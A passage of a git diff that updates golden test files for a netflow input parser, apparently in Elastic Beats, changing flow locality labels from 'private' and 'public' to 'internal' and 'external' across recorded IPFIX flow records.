6, "port": 0 } @@ -631,7 +631,7 @@ "Fields": { "destination": { "ip": "172.20.4.30", - "locality": "private", + "locality": "internal", "port": 59571 }, "event": { @@ -647,7 +647,7 @@ }, "flow": { "id": "_XZysP4InTc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.20.4.30", @@ -695,7 +695,7 @@ "source": { "bytes": 784, "ip": "10.10.8.105", - "locality": "private", + "locality": "internal", "packets": 6, "port": 22 } @@ -709,7 +709,7 @@ "Fields": { "destination": { "ip": "10.10.8.105", - "locality": "private", + "locality": "internal", "port": 22 }, "event": { @@ -725,7 +725,7 @@ }, "flow": { "id": "_XZysP4InTc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.10.8.105", 
@@ -773,7 +773,7 @@ "source": { "bytes": 433, "ip": "172.20.4.30", - "locality": "private", + "locality": "internal", "packets": 8, "port": 59571 } @@ -787,7 +787,7 @@ "Fields": { "destination": { "ip": "192.168.183.199", - "locality": "private", + "locality": "internal", "port": 6667 }, "event": { @@ -803,7 +803,7 @@ }, "flow": { "id": "5stvUzTWY8c", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.183.199", @@ -851,7 +851,7 @@ "source": { "bytes": 196, "ip": "10.10.7.11", - "locality": "private", + "locality": "internal", "packets": 3, "port": 48378 } @@ -865,7 +865,7 @@ "Fields": { "destination": { "ip": "192.168.230.216", - "locality": "private", + "locality": "internal", "port": 48378 }, "event": { @@ -881,7 +881,7 @@ }, "flow": { "id": "VdPCBSYnnS0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.230.216", @@ -929,7 +929,7 @@ "source": { "bytes": 206, "ip": "192.168.183.199", - "locality": "private", + "locality": "internal", "packets": 3, "port": 6667 } @@ -943,7 +943,7 @@ "Fields": { "destination": { "ip": "172.20.4.30", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -959,7 +959,7 @@ }, "flow": { "id": "asoP1PL3Pao", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.20.4.30", @@ -1007,7 +1007,7 @@ "source": { "bytes": 504, "ip": "10.10.8.34", - "locality": "private", + "locality": "internal", "packets": 6, "port": 0 } @@ -1021,7 +1021,7 @@ "Fields": { "destination": { "ip": "10.10.8.220", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1037,7 +1037,7 @@ }, "flow": { "id": "r6DcuKSlKG8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.10.8.220", @@ -1085,7 +1085,7 @@ "source": { "bytes": 3539, "ip": "172.20.5.191", - "locality": "private", + "locality": "internal", "packets": 58, "port": 42502 } 
@@ -1099,7 +1099,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1115,7 +1115,7 @@ }, "flow": { "id": "4AA5ETLDkm0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1163,7 +1163,7 @@ "source": { "bytes": 495, "ip": "172.20.4.1", - "locality": "private", + "locality": "internal", "packets": 3, "port": 33332 } @@ -1177,7 +1177,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1193,7 +1193,7 @@ }, "flow": { "id": "4AA5ETLDkm0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1241,7 +1241,7 @@ "source": { "bytes": 330, "ip": "172.20.4.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 33332 } @@ -1255,7 +1255,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1271,7 +1271,7 @@ }, "flow": { "id": "BaTGW6h8V9s", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1319,7 +1319,7 @@ "source": { "bytes": 435, "ip": "172.30.0.1", - "locality": "private", + "locality": "internal", "packets": 3, "port": 53298 } @@ -1333,7 +1333,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1349,7 +1349,7 @@ }, "flow": { "id": "BaTGW6h8V9s", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1397,7 +1397,7 @@ "source": { "bytes": 290, "ip": "172.30.0.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 53298 } 
@@ -1411,7 +1411,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1427,7 +1427,7 @@ }, "flow": { "id": "a0peNOTOYXA", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1475,7 +1475,7 @@ "source": { "bytes": 495, "ip": "10.10.6.1", - "locality": "private", + "locality": "internal", "packets": 3, "port": 48172 } @@ -1489,7 +1489,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1505,7 +1505,7 @@ }, "flow": { "id": "a0peNOTOYXA", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1553,7 +1553,7 @@ "source": { "bytes": 330, "ip": "10.10.6.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 48172 } @@ -1567,7 +1567,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1583,7 +1583,7 @@ }, "flow": { "id": "rX81_0wnl4c", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1631,7 +1631,7 @@ "source": { "bytes": 495, "ip": "10.10.7.1", - "locality": "private", + "locality": "internal", "packets": 3, "port": 48935 } @@ -1645,7 +1645,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1661,7 +1661,7 @@ }, "flow": { "id": "rX81_0wnl4c", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1709,7 +1709,7 @@ "source": { "bytes": 330, "ip": "10.10.7.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 48935 } 
@@ -1723,7 +1723,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1739,7 +1739,7 @@ }, "flow": { "id": "7EW3D8kjT4Q", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1787,7 +1787,7 @@ "source": { "bytes": 495, "ip": "10.10.8.1", - "locality": "private", + "locality": "internal", "packets": 3, "port": 51931 } @@ -1801,7 +1801,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1817,7 +1817,7 @@ }, "flow": { "id": "7EW3D8kjT4Q", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1865,7 +1865,7 @@ "source": { "bytes": 330, "ip": "10.10.8.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 51931 } @@ -1879,7 +1879,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1895,7 +1895,7 @@ }, "flow": { "id": "JacJ1_FgpYg", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1943,7 +1943,7 @@ "source": { "bytes": 495, "ip": "10.20.0.1", - "locality": "private", + "locality": "internal", "packets": 3, "port": 43454 } @@ -1957,7 +1957,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1973,7 +1973,7 @@ }, "flow": { "id": "JacJ1_FgpYg", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -2021,7 +2021,7 @@ "source": { "bytes": 330, "ip": "10.20.0.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 43454 } 
@@ -2035,7 +2035,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -2051,7 +2051,7 @@ }, "flow": { "id": "38frmBtEgfI", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -2099,7 +2099,7 @@ "source": { "bytes": 495, "ip": "10.10.10.1", - "locality": "private", + "locality": "internal", "packets": 3, "port": 52837 } @@ -2113,7 +2113,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -2129,7 +2129,7 @@ }, "flow": { "id": "38frmBtEgfI", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -2177,7 +2177,7 @@ "source": { "bytes": 330, "ip": "10.10.10.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 52837 } @@ -2205,7 +2205,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:401", @@ -2271,7 +2271,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:401", @@ -2337,7 +2337,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:501", @@ -2403,7 +2403,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:501", @@ -2469,7 +2469,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:601", @@ -2535,7 +2535,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:601", 
@@ -2601,7 +2601,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:701", @@ -2667,7 +2667,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:701", @@ -2733,7 +2733,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:801", @@ -2799,7 +2799,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:801", @@ -2865,7 +2865,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:901", @@ -2931,7 +2931,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:901", @@ -2997,7 +2997,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:1001", @@ -3063,7 +3063,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:1001", @@ -3129,7 +3129,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:1101", @@ -3195,7 +3195,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:1101", @@ -3261,7 +3261,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:1201", 
@@ -3327,7 +3327,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:1201", diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Netscaler-with-variable-length-fields.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Netscaler-with-variable-length-fields.golden.json index ebfee37989bc..e27655fe1edb 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Netscaler-with-variable-length-fields.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Netscaler-with-variable-length-fields.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.0.0.1", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "8wXIKNz6u_8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.0.0.1", @@ -94,7 +94,7 @@ "source": { "bytes": 40, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 1, "port": 51053 } @@ -108,7 +108,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 51053 }, "event": { @@ -124,7 +124,7 @@ }, "flow": { "id": "8wXIKNz6u_8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -183,7 +183,7 @@ "source": { "bytes": 1525, "ip": "10.0.0.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 443 } @@ -197,7 +197,7 @@ "Fields": { "destination": { "ip": "10.0.0.1", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -213,7 +213,7 @@ }, "flow": { "id": "8wXIKNz6u_8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.0.0.1", @@ -284,7 +284,7 @@ "source": { "bytes": 1541, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 51053 } 
diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Nokia-BRAS.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Nokia-BRAS.golden.json index 54a8240bcd50..f21438c20eef 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Nokia-BRAS.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Nokia-BRAS.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.0.0.34", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "aVnWxMM8qxI", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.0.0.34", @@ -63,7 +63,7 @@ }, "source": { "ip": "10.0.1.228", - "locality": "private", + "locality": "internal", "port": 5878 } }, diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-OpenBSD-pflow.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-OpenBSD-pflow.golden.json index 09b25e1256bf..4961f7d0a257 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-OpenBSD-pflow.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-OpenBSD-pflow.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "_dzJqQAoWYk", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -67,7 +67,7 @@ "source": { "bytes": 373, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 7, "port": 64020 } @@ -81,7 +81,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64020 }, "event": { @@ -97,7 +97,7 @@ }, "flow": { "id": "_dzJqQAoWYk", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", 
@@ -141,7 +141,7 @@ "source": { "bytes": 6634, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 8, "port": 80 } @@ -155,7 +155,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -171,7 +171,7 @@ }, "flow": { "id": "iSYE82PBcbQ", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -215,7 +215,7 @@ "source": { "bytes": 453, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 9, "port": 64021 } @@ -229,7 +229,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64021 }, "event": { @@ -245,7 +245,7 @@ }, "flow": { "id": "iSYE82PBcbQ", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -289,7 +289,7 @@ "source": { "bytes": 10893, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 11, "port": 80 } @@ -303,7 +303,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -319,7 +319,7 @@ }, "flow": { "id": "iSYE82PBcbQ", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -363,7 +363,7 @@ "source": { "bytes": 453, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 9, "port": 64021 } @@ -377,7 +377,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64021 }, "event": { @@ -393,7 +393,7 @@ }, "flow": { "id": "iSYE82PBcbQ", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -437,7 +437,7 @@ "source": { "bytes": 10893, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 11, "port": 80 } 
@@ -451,7 +451,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -467,7 +467,7 @@ }, "flow": { "id": "L_N7tNeOZwc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -511,7 +511,7 @@ "source": { "bytes": 373, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 7, "port": 64022 } @@ -525,7 +525,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64022 }, "event": { @@ -541,7 +541,7 @@ }, "flow": { "id": "L_N7tNeOZwc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -585,7 +585,7 @@ "source": { "bytes": 6780, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 8, "port": 80 } @@ -599,7 +599,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -615,7 +615,7 @@ }, "flow": { "id": "L_N7tNeOZwc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -659,7 +659,7 @@ "source": { "bytes": 373, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 7, "port": 64022 } @@ -673,7 +673,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64022 }, "event": { @@ -689,7 +689,7 @@ }, "flow": { "id": "L_N7tNeOZwc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -733,7 +733,7 @@ "source": { "bytes": 6780, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 8, "port": 80 } @@ -747,7 +747,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { 
@@ -763,7 +763,7 @@ }, "flow": { "id": "Dsp4RZAzcPQ", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -807,7 +807,7 @@ "source": { "bytes": 373, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 7, "port": 64023 } @@ -821,7 +821,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64023 }, "event": { @@ -837,7 +837,7 @@ }, "flow": { "id": "Dsp4RZAzcPQ", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -881,7 +881,7 @@ "source": { "bytes": 7319, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 9, "port": 80 } @@ -895,7 +895,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -911,7 +911,7 @@ }, "flow": { "id": "Dsp4RZAzcPQ", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -955,7 +955,7 @@ "source": { "bytes": 373, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 7, "port": 64023 } @@ -969,7 +969,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64023 }, "event": { @@ -985,7 +985,7 @@ }, "flow": { "id": "Dsp4RZAzcPQ", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1029,7 +1029,7 @@ "source": { "bytes": 7319, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 9, "port": 80 } @@ -1043,7 +1043,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1059,7 +1059,7 @@ }, "flow": { "id": "B9Jsqhany8Q", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", 
@@ -1103,7 +1103,7 @@ "source": { "bytes": 333, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 6, "port": 64024 } @@ -1117,7 +1117,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64024 }, "event": { @@ -1133,7 +1133,7 @@ }, "flow": { "id": "B9Jsqhany8Q", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1177,7 +1177,7 @@ "source": { "bytes": 1833, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 5, "port": 80 } @@ -1191,7 +1191,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1207,7 +1207,7 @@ }, "flow": { "id": "B9Jsqhany8Q", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -1251,7 +1251,7 @@ "source": { "bytes": 333, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 6, "port": 64024 } @@ -1265,7 +1265,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64024 }, "event": { @@ -1281,7 +1281,7 @@ }, "flow": { "id": "B9Jsqhany8Q", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1325,7 +1325,7 @@ "source": { "bytes": 1833, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 5, "port": 80 } @@ -1339,7 +1339,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1355,7 +1355,7 @@ }, "flow": { "id": "O7k79Py4ef0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", 
@@ -1399,7 +1399,7 @@ "source": { "bytes": 453, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 9, "port": 64025 } @@ -1413,7 +1413,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64025 }, "event": { @@ -1429,7 +1429,7 @@ }, "flow": { "id": "O7k79Py4ef0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1473,7 +1473,7 @@ "source": { "bytes": 10550, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 11, "port": 80 } @@ -1487,7 +1487,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1503,7 +1503,7 @@ }, "flow": { "id": "O7k79Py4ef0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -1547,7 +1547,7 @@ "source": { "bytes": 453, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 9, "port": 64025 } @@ -1561,7 +1561,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64025 }, "event": { @@ -1577,7 +1577,7 @@ }, "flow": { "id": "O7k79Py4ef0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1621,7 +1621,7 @@ "source": { "bytes": 10550, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 11, "port": 80 } @@ -1635,7 +1635,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1651,7 +1651,7 @@ }, "flow": { "id": "T1etbJ4WSI0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", 
@@ -1695,7 +1695,7 @@ "source": { "bytes": 373, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 7, "port": 64026 } @@ -1709,7 +1709,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64026 }, "event": { @@ -1725,7 +1725,7 @@ }, "flow": { "id": "T1etbJ4WSI0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1769,7 +1769,7 @@ "source": { "bytes": 6425, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 8, "port": 80 } @@ -1783,7 +1783,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1799,7 +1799,7 @@ }, "flow": { "id": "T1etbJ4WSI0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -1843,7 +1843,7 @@ "source": { "bytes": 373, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 7, "port": 64026 } @@ -1857,7 +1857,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64026 }, "event": { @@ -1873,7 +1873,7 @@ }, "flow": { "id": "T1etbJ4WSI0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1917,7 +1917,7 @@ "source": { "bytes": 6425, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 8, "port": 80 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Procera.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Procera.golden.json index 47dcb8c30083..30acfdf29c56 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Procera.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Procera.golden.json 
@@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "138.44.161.14", - "locality": "public", + "locality": "external", "port": 47838 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "gEodlN50y4w", - "locality": "public" + "locality": "external" }, "netflow": { "bgp_destination_as_number": 7575, @@ -75,7 +75,7 @@ }, "source": { "ip": "181.214.87.71", - "locality": "public", + "locality": "external", "port": 53787 } }, @@ -88,7 +88,7 @@ "Fields": { "destination": { "ip": "0.0.0.0", - "locality": "private", + "locality": "internal", "port": 135 }, "event": { @@ -104,7 +104,7 @@ }, "flow": { "id": "GYmhjYyvaAI", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -156,7 +156,7 @@ }, "source": { "ip": "0.0.0.0", - "locality": "private", + "locality": "internal", "port": 136 } }, @@ -169,7 +169,7 @@ "Fields": { "destination": { "ip": "138.44.161.14", - "locality": "public", + "locality": "external", "port": 22252 }, "event": { @@ -185,7 +185,7 @@ }, "flow": { "id": "qSSNfC38l0c", - "locality": "public" + "locality": "external" }, "netflow": { "bgp_destination_as_number": 7575, @@ -237,7 +237,7 @@ }, "source": { "ip": "5.188.11.35", - "locality": "public", + "locality": "external", "port": 44155 } }, @@ -250,7 +250,7 @@ "Fields": { "destination": { "ip": "138.44.161.14", - "locality": "public", + "locality": "external", "port": 8 }, "event": { @@ -266,7 +266,7 @@ }, "flow": { "id": "Tv1jmZy2vn4", - "locality": "public" + "locality": "external" }, "netflow": { "bgp_destination_as_number": 7575, @@ -318,7 +318,7 @@ }, "source": { "ip": "206.117.25.89", - "locality": "public", + "locality": "external", "port": 0 } }, @@ -331,7 +331,7 @@ "Fields": { "destination": { "ip": "0.0.0.0", - "locality": "private", + "locality": "internal", "port": 135 }, "event": { @@ -347,7 +347,7 @@ }, "flow": { "id": "GYmhjYyvaAI", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, 
